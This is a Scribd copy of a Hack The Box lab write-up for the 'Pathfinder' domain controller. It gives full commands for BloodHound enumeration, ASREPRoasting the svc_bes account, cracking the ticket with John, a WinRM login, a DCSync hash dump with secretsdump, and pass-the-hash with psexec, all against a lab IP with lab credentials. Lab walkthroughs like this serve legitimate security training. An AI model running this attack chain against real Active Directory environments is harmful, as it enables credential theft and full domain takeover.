Scribd
Upload
29 views6 pages

Pathfinder

Python

Uploaded by

Carlos Minano
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
29 views6 pages

Pathfinder

Python

Uploaded by

Carlos Minano
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 6

 

Pathfinder
31st January 2020 / Document No.
D20.101.28

Prepared By: egotisticalSW

Machine Author(s): egotisticalSW

Difficulty: Easy

Classification: Official
Enumeration
masscan -p 1-65535 10.10.10.30 -e tun0 --rate=1000

Port 88 is typically associated with Kerberos and port 389 with LDAP, which indicates that this is a
Domain Controller. We note that WinRM is enabled on port 5985.
Enumeration
Using the credentials we obtained in a previous machine; sandra:Password1234! , we can
attempt to enumerate Active Directory. We can achieve this using BloodHound. There is a python
bloodhound injester, which can be found here. It can also be installed using pip: pip install
bloodhound

bloodhound-python -d megacorp.local -u sandra -p "Password1234!" -gc


pathfinder.megacorp.local -c all -ns 10.10.10.30

The json files should now be in the working directory, ready to be imported into BloodHound.

Installing and Starting BloodHound

First, we need to install neo4j and BloodHound.

apt install neo4j


apt install bloodhound

Next, we need to configure the neo4j service. We can accomplish this by running the following
command

neo4j start console

You will be then prompted to change your password. Next, we start BloodHound

bloodhound --no-sandbox

Ensure you have a connection to the database; indicated by a ✔ symbol at the top of the three
input fields. The default username is neo4j with the password previously set.

Opening BloodHound, we can drag and drop the .json files, and BloodHound will begin to analyze
the data. We can select various queries, of which some very useful ones are Shortest Paths to
High value Targets and Find Principles with DCSync Rights .
While the latter query returns this:

We can see that the svc_bes has GetChangesAll privileges to the domain. This means that the
account has the ability to request replication data from the domain controller, and gain sensitive
information such as user hashes.
Lateral Movement
It's worth checking if Kerberos pre-authentication has been disabled for this account, which
means it is vulnerable to ASREPRoasting. We can check this using a tool such as Impacket's
GetNPUsers .

GetNPUsers.py megacorp.local/svc_bes -request -no-pass -dc-ip 10.10.10.30

We obtain the TGT ticket for the svc_bes and save it to a file called hash . We can use Hashcat or
JTR in conjunction with rockyou.txt to obtain the plaintext password Sheffield19 .

john hash -wordlist=/usr/share/wordlists/rockyou.txt

It is now possible to access the server as svc_bes using WinRM, and gain user.txt.

gem install evil-winrm


evil-winrm -i 10.10.10.30 -u svc_bes -p Sheffield19
Privilege Escalation
In order to leverage the GetChangesAll permission, we can use Impacket's secretsdump.py to
perform a DCSync attack and dump the NTLM hashes of all domain users.

secretsdump.py -dc-ip 10.10.10.30 MEGACORP.LOCAL/svc_bes:[email protected]

Using the default domain administrator NTLM hash, we can use this in a PTH attack to gain
elevated access to the system. For this, we can use Impacket's psexec.py.

psexec.py megacorp.local/[email protected] -hashes <NTML hash>:<NTLM


hash>

You might also like